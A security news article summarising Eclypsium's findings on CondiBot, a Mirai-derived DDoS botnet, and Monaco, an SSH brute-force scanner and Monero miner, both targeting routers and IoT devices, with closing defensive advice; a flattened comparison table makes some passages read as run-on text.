Malware Operators Hijack Network Devices For DDoS Attacks and Crypto Mining

As hackers focus more on network infrastructure instead of traditional endpoints, the attack surface of businesses is changing quickly. Researchers in the field of security have noticed a sharp rise in attacks on routers, firewalls, and IoT devices. This shows a growing trend in which these systems are used for both large-scale DDoS attacks and cryptocurrency mining.

Eclypsium's most recent research shows that this kind of activity is no longer limited to advanced nation-state groups. Attackers who are motivated by money are now using the same methods to make money from hacked devices. These attacks take advantage of weak settings, unpatched security holes, and a lack of visibility into network hardware. New Types of Malware Devices on the Target Network On March 6, 2026, researchers found two new types of malware that were actively targeting Linux-based systems and network devices.

The first one, CondiBot, is a new type of botnet that came from Mirai. It is meant to turn infected devices into nodes that can be controlled from afar and used to launch distributed denial-of-service (DDoS) attacks. This version is different from the ones before it because it works with more than one system architecture, such as ARM, MIPS, and x86.

This means it can infect a lot of different devices. How the Attack Works (Source: eclypsium) CondiBot uses several ways to download files, like wget, curl, and TFTP, to make sure the infection works. When installed, it connects to a command-and-control (C2) server, disables reboot functions, and gets rid of other malware. After that, it waits for orders to start network attacks.

Researchers also found that this version has more ways to attack and new identifiers, which means that work is still going on.

The second strain, "Monaco," is a mix of an SSH scanner and a crypto-miner. Written in Go, it looks for open SSH services on the internet and uses brute-force methods with common passwords to get in. Once inside, it installs Monero mining software and sends stolen login information back to its C2 infrastructure.

Monaco is meant to work on a lot of different devices, like servers, routers, and IoT devices. It also kills other miners and speeds up the system to get the most cryptocurrency possible. Devices on the network Globally Hijacked (Source: eclypsium) Increasing Trend and Business Risk Eclypsium research shows that these campaigns are part of a bigger trend that has been noted in industry reports. There has been a big rise in the number of attacks on network devices, and many of them happen before patches are applied.

Attackers often get in without any user interaction by going after systems that are connected to the internet, like VPNs and gateways. CondiBot Variant Monaco Miner is a feature Main goal: carrying out DDoS botnet attacks Scanning SSH and mining Monero on target systems Linux devices that use ARM, MIPS, or x86 Juniper networks, servers, and routers First Access Payload drops with transfer tools Guessing passwords over SSH connections Specific Information Internal label "QTXBOT" that is hidden Made with Go and hosted on Alibaba Cloud Staying Hidden Manipulating hardware to stay active Making backup plans is important for network devices because they don't always have the same security monitoring tools as other devices. This makes it hard to see what's going on, which lets attackers stay hidden for a long time.

Once hacked, these devices give you strategic access for moving sideways, intercepting traffic, and keeping control. The rise of malware like CondiBot and Monaco shows how hackers are using both disruption and profit-seeking methods to get what they want. As network infrastructure becomes a major target, businesses must make patching, strong credentials, and better monitoring of these important systems their top priorities.